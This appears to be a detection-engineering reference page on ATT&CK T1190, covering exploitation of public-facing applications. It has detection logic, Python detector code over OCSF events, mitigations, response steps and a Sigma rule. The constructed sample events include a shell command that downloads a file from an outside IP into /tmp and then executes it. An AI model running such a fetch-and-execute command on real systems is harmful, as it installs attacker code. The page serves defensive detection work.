T1190 Defined ATT&CK T1190 ↗

Exploit Public-Facing Application

Attacker Modify ApplicationProcess — Exploit a vulnerability in a public-facing application to cause it to execute attacker-controlled code or expose data beyond its intended scope.

Ontological Definition
Actor: Attacker
Action: Modify
Artifact: ApplicationProcess

Detect

STP 3

CVE-specific signatures are STP 1–2. Post-exploitation behavioral signals (application process spawning a shell, writing executables to unexpected paths) use variable victim-side fields and require baselining — STP 3.

Gate on
activity_id = Access

Focus on post-exploitation signals: the application process spawning a shell or writing executables outside its expected paths. CVE-specific WAF rules are STP 1–2.
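The two post-exploitation signals above, plus the correlation a practitioner would actually want (a file the application dropped outside its baseline is later executed), as an added example over OCSF-shaped events. This is not code from the page or from any OCSF or Sigma project. It assumes: events are Python dicts using OCSF field names; class_uid 1007 (Process Activity, activity_id 1 = Launch) and 1001 (File System Activity, activity_id 1 = Create, 3 = Update) carry their standard OCSF values; the baselines PUBLIC_APP_BINARIES and EXPECTED_WRITE_PATHS are hypothetical and in practice come from baselining the deployment; the sample event stream is constructed. It also evaluates the definitional Sigma selection from further down the page to show that on its own it matches ordinary traffic.

```python
"""Narrowed T1190 post-exploitation detection over OCSF-shaped events.

Added example, not the page's own code. Assumptions: OCSF field names and the
class/activity ids below are standard; the binary and path baselines are
hypothetical; the event stream at the bottom is constructed.
"""

# Hypothetical baseline: binaries that serve the public-facing application and
# the directories each is expected to write under. Comes from baselining.
PUBLIC_APP_BINARIES = {"java", "nginx", "httpd", "node", "gunicorn"}
EXPECTED_WRITE_PATHS = {
    "java": ("/opt/app/tmp/", "/var/log/app/"),
    "nginx": ("/var/cache/nginx/", "/var/log/nginx/"),
}
# Shells and interpreters a web application process has no business spawning.
SHELLS = {"sh", "bash", "dash", "zsh", "busybox", "python3", "perl"}

PROCESS_ACTIVITY, FILE_SYSTEM_ACTIVITY, WEB_RESOURCES_ACTIVITY = 1007, 1001, 6001
LAUNCH, FILE_CREATE, FILE_UPDATE = 1, 1, 3


def _name(path):
    return path.rsplit("/", 1)[-1]


def matches_definitional_rule(event):
    """The page's definitional Sigma selection: class 6001 with an Access activity.
    OCSF carries the label in activity_name and the integer in activity_id."""
    return event.get("class_uid") == WEB_RESOURCES_ACTIVITY and event.get("activity_name") == "Access"


def actor_binary(event):
    """Basename of the process that performed the activity (actor.process)."""
    return _name(event["actor"]["process"]["file"]["path"])


def shell_spawn(event):
    """Process Launch where a public-facing app binary is the parent and the child is a shell."""
    if event.get("class_uid") != PROCESS_ACTIVITY or event.get("activity_id") != LAUNCH:
        return None
    parent, child = actor_binary(event), _name(event["process"]["file"]["path"])
    if parent in PUBLIC_APP_BINARIES and child in SHELLS:
        return f"{parent} spawned {child}: {event['process'].get('cmd_line', '')!r}"
    return None


def unexpected_write(event):
    """File create/update by an app binary to a path outside its baselined directories.
    A binary with no baseline entry has every write flagged (startswith(()) is False)."""
    if event.get("class_uid") != FILE_SYSTEM_ACTIVITY or event.get("activity_id") not in (FILE_CREATE, FILE_UPDATE):
        return None
    binary = actor_binary(event)
    if binary not in PUBLIC_APP_BINARIES:
        return None
    path = event["file"]["path"]
    return None if path.startswith(EXPECTED_WRITE_PATHS.get(binary, ())) else path


def detect(events):
    """Single pass over an event stream; returns (severity, message) findings.

    A write outside the baseline is medium on its own. If any later Launch
    executes that same path, the correlation is escalated to high: a dropped
    file being run needs no CVE knowledge and no shell in the chain.
    """
    dropped, findings = set(), []
    for e in events:
        msg = shell_spawn(e)
        if msg:
            findings.append(("high", msg))
        path = unexpected_write(e)
        if path:
            dropped.add(path)
            findings.append(("medium", f"{actor_binary(e)} wrote outside baseline: {path}"))
        if e.get("class_uid") == PROCESS_ACTIVITY and e.get("activity_id") == LAUNCH:
            launched = e["process"]["file"]["path"]
            if launched in dropped:
                findings.append(("high", f"dropped file executed: {launched}"))
    return findings


def _proc(actor_path, child_path, cmd_line):
    return {"class_uid": PROCESS_ACTIVITY, "activity_id": LAUNCH,
            "actor": {"process": {"file": {"path": actor_path}}},
            "process": {"file": {"path": child_path}, "cmd_line": cmd_line}}


def _file(actor_path, path, activity_id=FILE_CREATE):
    return {"class_uid": FILE_SYSTEM_ACTIVITY, "activity_id": activity_id,
            "actor": {"process": {"file": {"path": actor_path}}},
            "file": {"path": path}}


# Constructed sample stream: one web access (matches the definitional rule but
# proves nothing by itself), an exploit chain, then benign background activity.
SAMPLE_EVENTS = [
    {"class_uid": WEB_RESOURCES_ACTIVITY, "activity_name": "Access",
     "src_endpoint": {"ip": "203.0.113.7"}, "web_resources": [{"url_string": "/api/upload"}]},
    _proc("/usr/lib/jvm/bin/java", "/bin/sh", "sh -c 'curl 198.51.100.9/x -o /tmp/.x'"),
    _file("/usr/lib/jvm/bin/java", "/tmp/.x"),
    _proc("/bin/sh", "/tmp/.x", "/tmp/.x"),
    _file("/usr/sbin/nginx", "/var/cache/nginx/a1b2"),
    _file("/usr/lib/jvm/bin/java", "/var/log/app/access.log", FILE_UPDATE),
    _proc("/usr/lib/jvm/bin/java", "/usr/bin/git", "git rev-parse HEAD"),
]

if __name__ == "__main__":
    print("definitional rule hits:", sum(matches_definitional_rule(e) for e in SAMPLE_EVENTS))
    for severity, message in detect(SAMPLE_EVENTS):
        print(severity, message)
```

On the constructed stream the definitional rule fires once, on the ordinary request, while the narrowed logic yields three findings from the exploit chain (shell spawn, drop outside baseline, dropped file executed) and nothing from the benign nginx, log-write and git events. The baselines are where the STP 3 cost lives: a wrong EXPECTED_WRITE_PATHS entry produces either noise or a blind spot, so it should be generated from observed behaviour rather than typed in.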

Mitigate

STP 5

Patching is STP 1 per CVE. Application sandboxing (seccomp, AppArmor, container constraints) prevents the post-exploitation effect — process spawning, filesystem writes — across all CVEs regardless of vulnerability class. This is STP 5 for the controlled post-attack state.

D3FEND controls: d3f:NetworkTrafficFiltering · d3f:ExecutionIsolation

Enforce process isolation and filesystem restrictions on all public-facing application processes (seccomp, AppArmor, container constraints).

Respond

Controlled

The application process now executes attacker-controlled code. Terminate the compromised application process immediately and isolate the host from the network; there is no separate injector process to kill, since the attacker acts remotely through the exploited service. Investigate every file the process wrote, every network connection it opened, and every child process it spawned.

Attacker foothold: Attacker Origin (src_endpoint)
Compromised by this technique: Vulnerable Application (process)
D3FEND response actions: d3f:ProcessTermination · d3f:NetworkIsolation
OCSF event model

Event class: Web Resources Activity (6001)  ·  activity_id: Access

Legend: attacker-controlled · post-success · victim · tainted
%%{init: {"theme": "dark", "themeVariables": {"edgeLabelBackground": "#18181b", "lineColor": "#52525b"}}}%%
graph TD
  classDef attacker fill:#7c2d12,stroke:#ea580c,color:#fed7aa
  classDef victim fill:#1e3a5f,stroke:#3b82f6,color:#bfdbfe
  classDef postSuccess fill:#78350f,stroke:#d97706,color:#fde68a
  classDef tainted fill:#18181b,stroke:#52525b,color:#a1a1aa

  EVENT(["Web Resources Activity\n· Access"])

  attacker_src["Attacker Origin\nsrc_endpoint\nd3f:Host"]:::attacker
  app_process["Vulnerable Application\nprocess\nd3f:Process"]:::postSuccess
  device["Host\ndevice\nd3f:Host\n⚠ tainted"]:::tainted

  EVENT --> attacker_src
  EVENT --> app_process
  EVENT --> device

  attacker_src -->|"exploits"| app_process
Attacker Origin (src_endpoint · d3f:Host) — attacker-controlled
  src_endpoint.ip (attacker_controlled): source IP; attacker-controlled and easily rotated, so not a stable detection key
  Countermeasures: d3f:NetworkTrafficFiltering
Vulnerable Application (process · d3f:Process) — post-success
  process.pid (variable): application process identifier; victim-side and OS-assigned, but the process it names runs attacker-controlled code after success
  Countermeasures: d3f:ProcessTermination · d3f:ExecutionIsolation
Host (device · d3f:Host) — tainted
  Countermeasures: d3f:NetworkIsolation
Definitional Sigma rule

Broad by design — defines the technique, not an operational alert. Gate on variable or attacker-controlled field conditions to narrow for production use.

title: Exploit Public-Facing Application (T1190)
status: experimental
description: >
  Definitional rule — broad by design. Defines the technique independent of
  medium, tool, or attacker-controlled variables. Narrow with variable and
  attacker-controlled field conditions for operational use.
logsource:
  product: ocsf
  category: Web Resources Activity (6001)
detection:
  selection:
    activity_id: 'Access'
  condition: selection
Environment-dependent entities

Generate org-specific sub-techniques using T1190.<platform>

Web Application

Custom or third-party web applications exposed to the internet

Apache/Nginx hosted apps · Django/Rails/Node applications · WordPress/CMS platforms
VPN / Remote Access

Network edge devices providing remote access

Citrix ADC · Pulse Secure · Fortinet FortiGate · Palo Alto GlobalProtect
Mail Server

Internet-facing mail infrastructure

Microsoft Exchange · Postfix · Zimbra
API Gateway

Externally exposed API surfaces

AWS API Gateway · Kong · Apigee
Seen in the wild (2 reports)

SSRF chained with XMLDecoder deserialization achieves RCE inside the WebLogic JVM without spawning a child process, which illustrates why T1190 EDEs need per-platform detection rules: this instance is invisible to rules that only watch for Java spawning shells, and has to be caught from JVM-side signals instead.

Authentication bypass in GlobalProtect allows forging auth override cookies — a T1190.panos EDE instance where the technique is application-specific and the post-attack state is controlled via an unauthorized VPN session.